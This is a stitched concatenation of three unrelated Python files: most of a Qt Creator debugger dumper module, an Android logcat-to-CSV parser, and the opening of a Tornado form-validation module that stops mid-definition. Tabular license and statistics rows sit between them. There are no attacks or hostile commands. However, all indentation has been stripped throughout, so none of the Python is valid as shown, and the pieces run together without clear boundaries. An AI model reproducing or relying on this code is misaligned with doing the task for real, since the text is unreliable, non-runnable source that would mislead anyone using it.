dumper = self.qqDumpersEx[pattern]
if re.match(pattern, nsStrippedType):
dumper(self, value)
return True
return False
def putSimpleCharArray(self, base, size = None):
if size is None:
elided, shown, data = self.readToFirstZero(base, 1, self.displayStringLimit)
else:
elided, shown = self.computeLimit(int(size), self.displayStringLimit)
data = self.readMemory(base, shown)
self.putValue(data, "latin1", elided=elided)
def putDisplay(self, editFormat, value):
self.put('editformat="%s",' % editFormat)
self.put('editvalue="%s",' % value)
# This is shared by pointer and array formatting.
def tryPutSimpleFormattedPointer(self, value, typeName, innerTypeName, displayFormat, limit):
if displayFormat == AutomaticFormat:
if innerTypeName == "char":
# Use UTF-8 as default for char *.
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if innerTypeName == "wchar_t":
self.putType(typeName)
charSize = self.lookupType('wchar_t').sizeof
(elided, data) = self.encodeCArray(value, charSize, limit)
if charSize == 2:
self.putValue(data, "utf16", elided=elided)
else:
self.putValue(data, "ucs4", elided=elided)
return True
if displayFormat == Latin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
return True
if displayFormat == SeparateLatin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
self.putDisplay("latin1:separate", data)
return True
if displayFormat == Utf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if displayFormat == SeparateUtf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
self.putDisplay("utf8:separate", data)
return True
if displayFormat == Local8BitStringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "local8bit", elided=elided)
return True
if displayFormat == Utf16StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 2, limit)
self.putValue(data, "utf16", elided=elided)
return True
if displayFormat == Ucs4StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 4, limit)
self.putValue(data, "ucs4", elided=elided)
return True
return False
def putFormattedPointer(self, value):
#warn("POINTER: %s" % value)
if self.isNull(value):
#warn("NULL POINTER")
self.putType(value.type)
self.putValue("0x0")
self.putNumChild(0)
return
typeName = str(value.type)
(dereferencable, pointerValue) = self.pointerInfo(value)
self.putAddress(pointerValue)
self.putOriginalAddress(value)
if not dereferencable:
# Failure to dereference a pointer should at least
# show the value of a pointer.
self.putValue(self.cleanAddress(pointerValue))
self.putType(typeName)
self.putNumChild(0)
return
displayFormat = self.currentItemFormat(value.type)
innerType = value.type.target().unqualified()
innerTypeName = str(innerType)
if innerTypeName == "void":
#warn("VOID POINTER: %s" % displayFormat)
self.putType(typeName)
self.putValue(str(value))
self.putNumChild(0)
return
if displayFormat == RawFormat:
# Explicitly requested bald pointer.
self.putType(typeName)
self.putValue(self.hexencode(str(value)), "utf8:1:0")
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, '*'):
self.putItem(value.dereference())
return
limit = self.displayStringLimit
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat:
limit = 1000000
if self.tryPutSimpleFormattedPointer(value, typeName, innerTypeName, displayFormat, limit):
self.putNumChild(0)
return
if Array10Format <= displayFormat and displayFormat <= Array1000Format:
n = (10, 100, 1000, 10000)[displayFormat - Array10Format]
self.putType(typeName)
self.putItemCount(n)
self.putArrayData(value, n, innerType)
return
if self.isFunctionType(innerType):
# A function pointer.
val = str(value)
pos = val.find(" = ") # LLDB only, but...
if pos > 0:
val = val[pos + 3:]
self.putValue(val)
self.putType(innerTypeName)
self.putNumChild(0)
return
#warn("AUTODEREF: %s" % self.autoDerefPointers)
#warn("INAME: %s" % self.currentIName)
if self.autoDerefPointers or self.currentIName.endswith('.this'):
# Generic pointer type with AutomaticFormat.
# Never dereference char types.
if innerTypeName != "char" \
and innerTypeName != "signed char" \
and innerTypeName != "unsigned char" \
and innerTypeName != "wchar_t":
self.putType(innerTypeName)
savedCurrentChildType = self.currentChildType
self.currentChildType = self.stripClassTag(innerTypeName)
self.putItem(value.dereference())
self.currentChildType = savedCurrentChildType
self.putOriginalAddress(value)
return
#warn("GENERIC PLAIN POINTER: %s" % value.type)
#warn("ADDR PLAIN POINTER: 0x%x" % value.address)
self.putType(typeName)
self.putValue("0x%x" % self.pointerValue(value))
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, "*"):
self.putItem(value.dereference())
def putOriginalAddress(self, value):
if not value.address is None:
self.put('origaddr="0x%x",' % toInteger(value.address))
def putQObjectNameValue(self, value):
try:
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(value, offset=ptrSize)
if self.qtVersion() < 0x050000:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc..
# - int postedEvents;
# - QMetaObject *metaObject;
# Offset of objectName in QObjectPrivate: 5 pointer + 2 int
# - [QObjectData base]
# - QString objectName
objectName = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
else:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc...
# - int postedEvents;
# - QDynamicMetaObjectData *metaObject;
extra = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
if extra == 0:
return False
# Offset of objectName in ExtraData: 6 pointer
# - QVector<QObjectUserData *> userData; only #ifndef QT_NO_USERDATA
# - QList<QByteArray> propertyNames;
# - QList<QVariant> propertyValues;
# - QVector<int> runningTimers;
# - QList<QPointer<QObject> > eventFilters;
# - QString objectName
objectName = self.extractPointer(extra + 5 * ptrSize)
data, size, alloc = self.byteArrayDataHelper(objectName)
# Object names are short, and GDB can crash on to big chunks.
# Since this here is a convenience feature only, limit it.
if size <= 0 or size > 80:
return False
raw = self.readMemory(data, 2 * size)
self.putValue(raw, "utf16", 1)
return True
except:
# warn("NO QOBJECT: %s" % value.type)
pass
def extractStaticMetaObjectHelper(self, typeobj):
"""
Checks whether type has a Q_OBJECT macro.
Returns the staticMetaObject, or 0.
"""
if self.isSimpleType(typeobj):
return 0
typeName = str(typeobj)
isQObjectProper = typeName == self.qtNamespace() + "QObject"
if not isQObjectProper:
if self.directBaseClass(typeobj, 0) is None:
return 0
# No templates for now.
if typeName.find('<') >= 0:
return 0
result = self.findStaticMetaObject(typeName)
# We need to distinguish Q_OBJECT from Q_GADGET:
# a Q_OBJECT SMO has a non-null superdata (unless it's QObject itself),
# a Q_GADGET SMO has a null superdata (hopefully)
if result and not isQObjectProper:
superdata = self.extractPointer(result)
if toInteger(superdata) == 0:
# This looks like a Q_GADGET
return 0
return result
def extractStaticMetaObject(self, typeobj):
"""
Checks recursively whether a type derives from QObject.
"""
if not self.useFancy:
return 0
typeName = str(typeobj)
result = self.knownStaticMetaObjects.get(typeName, None)
if result is not None: # Is 0 or the static metaobject.
return result
try:
result = self.extractStaticMetaObjectHelper(typeobj)
except RuntimeError as error:
warn("METAOBJECT EXTRACTION FAILED: %s" % error)
result = 0
except:
warn("METAOBJECT EXTRACTION FAILED FOR UNKNOWN REASON")
result = 0
if not result:
base = self.directBaseClass(typeobj, 0)
if base:
result = self.extractStaticMetaObject(base)
self.knownStaticMetaObjects[typeName] = result
return result
def staticQObjectMetaData(self, metaobject, offset1, offset2, step):
items = []
dd = metaobject["d"]
data = self.extractPointer(dd["data"])
sd = self.extractPointer(dd["stringdata"])
metaObjectVersion = self.extractInt(data)
itemCount = self.extractInt(data + offset1)
itemData = -offset2 if offset2 < 0 else self.extractInt(data + offset2)
if metaObjectVersion >= 7: # Qt 5.
byteArrayDataType = self.lookupType(self.qtNamespace() + "QByteArrayData")
byteArrayDataSize = byteArrayDataType.sizeof
for i in range(itemCount):
x = data + (itemData + step * i) * 4
literal = sd + self.extractInt(x) * byteArrayDataSize
ldata, lsize, lalloc = self.byteArrayDataHelper(literal)
items.append(self.extractBlob(ldata, lsize).toString())
else: # Qt 4.
for i in range(itemCount):
x = data + (itemData + step * i) * 4
ldata = sd + self.extractInt(x)
items.append(self.extractCString(ldata).decode("utf8"))
return items
def staticQObjectPropertyCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 24)
def staticQObjectPropertyNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 24, 28, 3)
def staticQObjectMethodCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 16)
def staticQObjectMethodNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 16, 20, 5)
def staticQObjectSignalCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 52)
def staticQObjectSignalNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 52, -14, 5)
def extractCString(self, addr):
result = bytearray()
while True:
d = self.extractByte(addr)
if d == 0:
break
result.append(d)
addr += 1
return result
def listChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
begin = self.extractInt(base + 8)
end = self.extractInt(base + 12)
array = base + 16
if self.qtVersion() < 0x50000:
array += self.ptrSize()
size = end - begin
innerSize = innerType.sizeof
stepSize = self.ptrSize()
addr = array + begin * stepSize
isInternal = innerSize <= stepSize and self.isMovableType(innerType)
for i in range(size):
if isInternal:
yield self.createValue(addr + i * stepSize, innerType)
else:
p = self.extractPointer(addr + i * stepSize)
yield self.createValue(p, innerType)
def vectorChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
size = self.extractInt(base + 4)
data = base + self.extractPointer(base + 8 + self.ptrSize())
innerSize = innerType.sizeof
for i in range(size):
yield self.createValue(data + i * innerSize, innerType)
# This is called is when a QObject derived class is expanded
def putQObjectGuts(self, qobject, smo):
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(qobject, offset=ptrSize)
isQt5 = self.qtVersion() >= 0x50000
extraDataOffset = 5 * ptrSize + 8 if isQt5 else 6 * ptrSize + 8
extraData = self.extractPointer(dd + extraDataOffset)
#with SubItem(self, "[extradata]"):
# self.putValue("0x%x" % toInteger(extraData))
# Parent and children.
try:
d_ptr = qobject["d_ptr"]["d"]
self.putSubItem("[parent]", d_ptr["parent"])
self.putSubItem("[children]", d_ptr["children"])
except:
pass
with SubItem(self, "[properties]"):
propertyCount = 0
usesVector = self.qtVersion() >= 0x50700
if self.isExpanded():
propertyNames = self.staticQObjectPropertyNames(smo)
propertyCount = len(propertyNames) # Doesn't include dynamic properties.
with Children(self):
# Static properties.
for i in range(propertyCount):
name = propertyNames[i]
self.putCallItem(str(name), qobject, "property", '"' + name + '"')
# Dynamic properties.
if extraData:
byteArrayType = self.lookupQtType("QByteArray")
variantType = self.lookupQtType("QVariant")
names = self.listChildrenGenerator(extraData + ptrSize, byteArrayType)
if usesVector:
values = self.vectorChildrenGenerator(extraData + 2 * ptrSize, variantType)
else:
values = self.listChildrenGenerator(extraData + 2 * ptrSize, variantType)
for (k, v) in zip(names, values):
with SubItem(self, propertyCount):
self.put('key="%s",' % self.encodeByteArray(k))
self.put('keyencoded="latin1",')
self.putItem(v)
propertyCount += 1
self.putValue(str('<%s items>' % propertyCount if propertyCount else '<>0 items>'))
self.putNumChild(1)
with SubItem(self, "[methods]"):
methodCount = self.staticQObjectMethodCount(smo)
self.putItemCount(methodCount)
if self.isExpanded():
methodNames = self.staticQObjectMethodNames(smo)
with Children(self):
for i in range(methodCount):
k = methodNames[i]
with SubItem(self, k):
self.putEmptyValue()
with SubItem(self, "[signals]"):
signalCount = self.staticQObjectSignalCount(smo)
self.putItemCount(signalCount)
if self.isExpanded():
signalNames = self.staticQObjectSignalNames(smo)
signalCount = len(signalNames)
with Children(self):
for i in range(signalCount):
k = signalNames[i]
with SubItem(self, k):
self.putEmptyValue()
self.putQObjectConnections(qobject)
def putQObjectConnections(self, qobject):
with SubItem(self, "[connections]"):
ptrSize = self.ptrSize()
self.putNoType()
ns = self.qtNamespace()
privateTypeName = ns + "QObjectPrivate"
privateType = self.lookupType(privateTypeName)
dd = qobject["d_ptr"]["d"]
d_ptr = dd.cast(privateType.pointer()).dereference()
connections = d_ptr["connectionLists"]
if self.isNull(connections):
self.putItemCount(0)
else:
connections = connections.dereference()
connections = connections.cast(self.directBaseClass(connections.type))
self.putSpecialValue("minimumitemcount", 0)
self.putNumChild(1)
if self.isExpanded():
pp = 0
with Children(self):
innerType = self.templateArgument(connections.type, 0)
# Should check: innerType == ns::QObjectPrivate::ConnectionList
base = self.extractPointer(connections)
data, size, alloc = self.vectorDataHelper(base)
connectionType = self.lookupType(ns + "QObjectPrivate::Connection")
for i in xrange(size):
first = self.extractPointer(data + i * 2 * ptrSize)
while first:
self.putSubItem("%s" % pp,
self.createPointerValue(first, connectionType))
first = self.extractPointer(first + 3 * ptrSize)
# We need to enforce some upper limit.
pp += 1
if pp > 1000:
break
def isKnownMovableType(self, typeName):
if typeName in (
"QBrush", "QBitArray", "QByteArray", "QCustomTypeInfo", "QChar", "QDate",
"QDateTime", "QFileInfo", "QFixed", "QFixedPoint", "QFixedSize",
"QHashDummyValue", "QIcon", "QImage", "QLine", "QLineF", "QLatin1Char",
"QLocale", "QMatrix", "QModelIndex", "QPoint", "QPointF", "QPen",
"QPersistentModelIndex", "QResourceRoot", "QRect", "QRectF", "QRegExp",
"QSize", "QSizeF", "QString", "QTime", "QTextBlock", "QUrl", "QVariant",
"QXmlStreamAttribute", "QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration", "QXmlStreamEntityDeclaration"
):
return True
return typeName == "QStringList" and self.qtVersion() >= 0x050000
def currentItemFormat(self, type = None):
displayFormat = self.formats.get(self.currentIName, AutomaticFormat)
if displayFormat == AutomaticFormat:
if type is None:
type = self.currentType.value
needle = self.stripForFormat(str(type))
displayFormat = self.typeformats.get(needle, AutomaticFormat)
return displayFormat
def putArrayData(self, base, n, innerType,
childNumChild = None, maxNumChild = 10000):
addrBase = toInteger(base)
innerSize = innerType.sizeof
enc = self.simpleEncoding(innerType)
if enc:
self.put('childtype="%s",' % innerType)
self.put('addrbase="0x%x",' % addrBase)
self.put('addrstep="0x%x",' % innerSize)
self.put('arrayencoding="%s",' % enc)
if n > maxNumChild:
self.put('childrenelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
self.put('arraydata="')
self.put(self.readMemory(addrBase, n * innerSize))
self.put('",')
else:
with Children(self, n, innerType, childNumChild, maxNumChild,
addrBase=addrBase, addrStep=innerSize):
for i in self.childRange():
self.putSubItem(i, self.createValue(addrBase + i * innerSize, innerType))
def putArrayItem(self, name, addr, n, typeName):
with SubItem(self, name):
self.putEmptyValue()
self.putType("%s [%d]" % (typeName, n))
self.putArrayData(addr, n, self.lookupType(typeName))
self.putAddress(addr)
def putPlotDataHelper(self, base, n, innerType, maxNumChild = 1000*1000):
if n > maxNumChild:
self.put('plotelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
if self.currentItemFormat() == ArrayPlotFormat and self.isSimpleType(innerType):
enc = self.simpleEncoding(innerType)
if enc:
self.putField("editencoding", enc)
self.putDisplay("plotdata:separate",
self.readMemory(base, n * innerType.sizeof))
def putPlotData(self, base, n, innerType, maxNumChild = 1000*1000):
self.putPlotDataHelper(base, n, innerType, maxNumChild=maxNumChild)
if self.isExpanded():
self.putArrayData(base, n, innerType, maxNumChild=maxNumChild)
def putSpecialArgv(self, value):
"""
Special handling for char** argv.
"""
n = 0
p = value
# p is 0 for "optimized out" cases. Or contains rubbish.
try:
if not self.isNull(p):
while not self.isNull(p.dereference()) and n <= 100:
p += 1
n += 1
except:
pass
with TopLevelItem(self, 'local.argv'):
self.put('iname="local.argv",name="argv",')
self.putItemCount(n, 100)
self.putType('char **')
if self.currentIName in self.expandedINames:
p = value
with Children(self, n):
for i in xrange(n):
self.putSubItem(i, p.dereference())
p += 1
def extractPointer(self, thing, offset = 0):
if isinstance(thing, int):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif sys.version_info[0] == 2 and isinstance(thing, long):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif isinstance(thing, Blob):
rawBytes = thing.toBytes()
else:
# Assume it's a (backend specific) Value.
rawBytes = self.toBlob(thing).toBytes()
code = "I" if self.ptrSize() == 4 else "Q"
return struct.unpack_from(code, rawBytes, offset)[0]
# Parses a..b and a.(s).b
def parseRange(self, exp):
# Search for the first unbalanced delimiter in s
def searchUnbalanced(s, upwards):
paran = 0
bracket = 0
if upwards:
open_p, close_p, open_b, close_b = '(', ')', '[', ']'
else:
open_p, close_p, open_b, close_b = ')', '(', ']', '['
for i in range(len(s)):
c = s[i]
if c == open_p:
paran += 1
elif c == open_b:
bracket += 1
elif c == close_p:
paran -= 1
if paran < 0:
return i
elif c == close_b:
bracket -= 1
if bracket < 0:
return i
return len(s)
match = re.search("(\.)(\(.+?\))?(\.)", exp)
if match:
s = match.group(2)
left_e = match.start(1)
left_s = 1 + left_e - searchUnbalanced(exp[left_e::-1], False)
right_s = match.end(3)
right_e = right_s + searchUnbalanced(exp[right_s:], True)
template = exp[:left_s] + '%s' + exp[right_e:]
a = exp[left_s:left_e]
b = exp[right_s:right_e]
try:
# Allow integral expressions.
ss = toInteger(self.parseAndEvaluate(s[1:len(s)-1]) if s else 1)
aa = toInteger(self.parseAndEvaluate(a))
bb = toInteger(self.parseAndEvaluate(b))
if aa < bb and ss > 0:
return True, aa, ss, bb + 1, template
except:
pass
return False, 0, 1, 1, exp
def putNumChild(self, numchild):
if numchild != self.currentChildNumChild:
self.put('numchild="%s",' % numchild)
def handleWatches(self, args):
for watcher in args.get("watchers", []):
iname = watcher['iname']
exp = self.hexdecode(watcher['exp'])
self.handleWatch(exp, exp, iname)
def handleWatch(self, origexp, exp, iname):
exp = str(exp).strip()
escapedExp = self.hexencode(exp)
#warn("HANDLING WATCH %s -> %s, INAME: '%s'" % (origexp, exp, iname))
# Grouped items separated by semicolon
if exp.find(";") >= 0:
exps = exp.split(';')
n = len(exps)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
for i in xrange(n):
self.handleWatch(exps[i], exps[i], "%s.%d" % (iname, i))
return
# Special array index: e.g a[1..199] or a[1.(3).199] for stride 3.
isRange, begin, step, end, template = self.parseRange(exp)
if isRange:
#warn("RANGE: %s %s %s in %s" % (begin, step, end, template))
r = range(begin, end, step)
n = len(r)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
with Children(self, n):
for i in r:
e = template % i
self.handleWatch(e, e, "%s.%s" % (iname, i))
return
# Fall back to less special syntax
#return self.handleWatch(origexp, exp, iname)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
self.put('wname="%s",' % escapedExp)
try:
value = self.parseAndEvaluate(exp)
self.putItem(value)
except RuntimeError:
self.currentType.value = " "
self.currentValue.value = "<no such value>"
self.currentChildNumChild = -1
self.currentNumChild = 0
self.putNumChild(0)
def registerDumper(self, funcname, function):
try:
if funcname.startswith("qdump__"):
typename = funcname[7:]
spec = inspect.getargspec(function)
if len(spec.args) == 2:
self.qqDumpers[typename] = function
elif len(spec.args) == 3 and len(spec.defaults) == 1:
self.qqDumpersEx[spec.defaults[0]] = function
self.qqFormats[typename] = self.qqFormats.get(typename, [])
elif funcname.startswith("qform__"):
typename = funcname[7:]
try:
self.qqFormats[typename] = function()
except:
self.qqFormats[typename] = []
elif funcname.startswith("qedit__"):
typename = funcname[7:]
try:
self.qqEditable[typename] = function
except:
pass
except:
pass
def setupDumpers(self, _ = {}):
self.resetCaches()
for mod in self.dumpermodules:
m = __import__(mod)
dic = m.__dict__
for name in dic.keys():
item = dic[name]
self.registerDumper(name, item)
msg = "dumpers=["
for key, value in self.qqFormats.items():
editable = ',editable="true"' if key in self.qqEditable else ''
formats = (',formats=\"%s\"' % str(value)[1:-1]) if len(value) else ''
msg += '{type="%s"%s%s},' % (key, editable, formats)
msg += '],'
v = 10000 * sys.version_info[0] + 100 * sys.version_info[1] + sys.version_info[2]
msg += 'python="%d"' % v
return msg
def reloadDumpers(self, args):
for mod in self.dumpermodules:
m = sys.modules[mod]
if sys.version_info[0] >= 3:
import importlib
importlib.reload(m)
else:
reload(m)
self.setupDumpers(args)
def addDumperModule(self, args):
path = args['path']
(head, tail) = os.path.split(path)
sys.path.insert(1, head)
self.dumpermodules.append(os.path.splitext(tail)[0])
def extractQStringFromQDataStream(self, buf, offset):
""" Read a QString from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('utf-16be')
return (string, offset + size)
def extractQByteArrayFromQDataStream(self, buf, offset):
""" Read a QByteArray from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('latin1')
return (string, offset + size)
def extractIntFromQDataStream(self, buf, offset):
""" Read an int from the stream """
value = struct.unpack_from("!I", buf, offset)[0]
return (value, offset + 4)
def handleInterpreterMessage(self):
""" Return True if inferior stopped """
resdict = self.fetchInterpreterResult()
return resdict.get('event') == 'break'
def reportInterpreterResult(self, resdict, args):
print('interpreterresult=%s,token="%s"'
% (self.resultToMi(resdict), args.get('token', -1)))
def reportInterpreterAsync(self, resdict, asyncclass):
print('interpreterasync=%s,asyncclass="%s"'
% (self.resultToMi(resdict), asyncclass))
def removeInterpreterBreakpoint(self, args):
res = self.sendInterpreterRequest('removebreakpoint', { 'id' : args['id'] })
return res
def insertInterpreterBreakpoint(self, args):
args['condition'] = self.hexdecode(args.get('condition', ''))
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
resdict = args.copy()
bp = None if response is None else response.get("breakpoint", None)
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
self.createResolvePendingBreakpointsHookBreakpoint(args)
resdict['number'] = -1
resdict['pending'] = 1
resdict['warning'] = 'Direct interpreter breakpoint insertion failed.'
self.reportInterpreterResult(resdict, args)
def resolvePendingInterpreterBreakpoint(self, args):
self.parseAndEvaluate('qt_qmlDebugEnableService("NativeQmlDebugger")')
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
resdict = args.copy()
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
resdict['number'] = -1
resdict['pending'] = 0
resdict['error'] = 'Pending interpreter breakpoint insertion failed.'
self.reportInterpreterAsync(resdict, 'breakpointmodified')
def fetchInterpreterResult(self):
buf = self.parseAndEvaluate("qt_qmlDebugMessageBuffer")
size = self.parseAndEvaluate("qt_qmlDebugMessageLength")
msg = self.hexdecode(self.readMemory(buf, size))
# msg is a sequence of 'servicename<space>msglen<space>msg' items.
resdict = {} # Native payload.
while len(msg):
pos0 = msg.index(' ') # End of service name
pos1 = msg.index(' ', pos0 + 1) # End of message length
service = msg[0:pos0]
msglen = int(msg[pos0+1:pos1])
msgend = pos1+1+msglen
payload = msg[pos1+1:msgend]
msg = msg[msgend:]
if service == 'NativeQmlDebugger':
try:
resdict = json.loads(payload)
continue
except:
warn("Cannot parse native payload: %s" % payload)
else:
print('interpreteralien=%s'
% {'service': service, 'payload': self.hexencode(payload)})
try:
expr = 'qt_qmlDebugClearBuffer()'
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Cleaning buffer failed: %s: %s" % (expr, error))
return resdict
def sendInterpreterRequest(self, command, args = {}):
encoded = json.dumps({ 'command': command, 'arguments': args })
hexdata = self.hexencode(encoded)
expr = 'qt_qmlDebugSendDataToService("NativeQmlDebugger","%s")' % hexdata
try:
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
except AttributeError as error:
# Happens with LLDB and 'None' current thread.
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
if not res:
warn("Interpreter command failed: %s " % encoded)
return {}
return self.fetchInterpreterResult()
def executeStep(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepin', args)
self.doContinue()
def executeStepOut(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepout', args)
self.doContinue()
def executeNext(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepover', args)
self.doContinue()
def executeContinue(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('continue', args)
self.doContinue()
def doInsertInterpreterBreakpoint(self, args, wasPending):
#warn("DO INSERT INTERPRETER BREAKPOINT, WAS PENDING: %s" % wasPending)
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
if wasPending:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'error': 'Pending interpreter breakpoint insertion failed.'}, args)
return
else:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'warning': 'Direct interpreter breakpoint insertion failed.'}, args)
self.createResolvePendingBreakpointsHookBreakpoint(args)
return
self.reportInterpreterResult({'bpnr': bp, 'pending': 0}, args)
def isInternalInterpreterFrame(self, functionName):
if functionName is None:
return False
if functionName.startswith("qt_v4"):
return True
return functionName.startswith(self.qtNamespace() + "QV4::")
# Hack to avoid QDate* dumper timeouts with GDB 7.4 on 32 bit
# due to misaligned %ebx in SSE calls (qstring.cpp:findChar)
def canCallLocale(self):
return True
def isReportableInterpreterFrame(self, functionName):
return functionName and functionName.find("QV4::Moth::VME::exec") >= 0
def extractQmlData(self, value):
if value.type.code == PointerCode:
value = value.dereference()
data = value["data"]
return data.cast(self.lookupType(str(value.type).replace("QV4::", "QV4::Heap::")))
# Contains iname, name, and value.
class LocalItem:
pass
def extractInterpreterStack(self):
return self.sendInterpreterRequest('backtrace', {'limit': 10 })
| gpl-3.0 | 2,995,124,426,568,365,000 | 36.45848 | 103 | 0.55573 | false |
chapinb/shattered | libs/liblogcat.py | 1 | 4282 | #!/usr/bin/env python3
##################################################################################
## ##
## _____ _ _ _ _ ##
## | __| |_ ___| |_| |_ ___ ___ ___ _| | ##
## |__ | | .'| _| _| -_| _| -_| . | ##
## |_____|_|_|__,|_| |_| |___|_| |___|___| ##
## ##
## ##
## Special Thanks to Julie Desautels, Jon Rajewski, and the LCDI for the ##
## research leading to the success of this script. ##
## ##
## Copyright 2013, Chapin Bryce ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
##################################################################################
## Logcat Parser
"""
This module is designed to parse data within the logcat export from shattered.
Run as a standalone, the module will prompt for an input and output file.
The output format is in csv.
ie. $ python3 logcat_lib.py
"""
import re
import os
import sys
def logcat_version():
"""
Function for calling the version of the code
"""
version = 20140213
print("Logcat Parser version: ", version)
def logcat_parser(inputfile, outputfile):
"""
This function parses the data from a logcat input file into csv format for easier reading.
Can be run as standalone script (ie ./logcat_lib.py) or imported to another script.
"""
logcat_version()
print("Parsing Logcat File...")
fin = open(inputfile, 'r')
fout = open(outputfile, 'w')
fout.write("Date, Time, PID, Level, Tag, Data")
bucket = ""
logname = re.compile(r'----*')
metainfostart = re.compile(r'^\[ \d')
metainfoend = re.compile(r'\]$')
anytext = re.compile(r'.*')
for line in fin:
line = line.strip()
if logname.findall(line):
print("Processesing Log: " + line)
loginfo = "Processesing Log: " + line
elif metainfoend.findall(line) and metainfostart.findall(line):
meta = line
meta = logcat_meta(meta)
fout.write(meta)
elif anytext.findall(line):
data = line
data = data.strip()
data = data.replace(",", " ")
bucket = data
fout.write(bucket)
fout.flush()
fout.close()
print("####################\nLogcat Processing Complete\n####################")
def logcat_meta(meta):
"""
This function breaks down the meta data information to allow better sorting and
filtering in CSV interpreters
"""
meta_a = meta.split()
date = meta_a[1]
time = meta_a[2]
pid = meta_a[3]
service = meta_a[4]
service_a = service.split("/")
level = service_a[0]
tag = service_a[1]
meta_out = "\n" + date + "," + time + "," + pid + "," + level + "," + tag + ","
return meta_out
| gpl-3.0 | 5,323,526,873,882,407,000 | 35.234783 | 94 | 0.429939 | false |
zzir/white | update_content.py | 1 | 3484 | import sqlite3
from wtforms.fields import StringField, IntegerField
from wtforms import validators
from wtforms_tornado import Form
from config import CONFIG
from get_content import TContents
class CheckContents(Form):
title = StringField(validators=[validators.length(min=1, max=100)])
slug = StringField(validators=[
validators.length(min=1, max=50),
validators.regexp(r"^[A-Za-z0-9_-]*$")
])
tags = StringField(validators=[validators.length(min=1, max=150)])
column = StringField(validators=[validators.length(max=50)], default='')
text = StringField(validators=[validators.length(min=1)])
short = StringField(validators=[validators.length(max=512)], default='')
top = IntegerField(validators=[validators.AnyOf([0,1])], default=0)
feed = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
comment = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
status = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
original = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
def add_contents(title, slug, created, modified, tags, column, text, short,
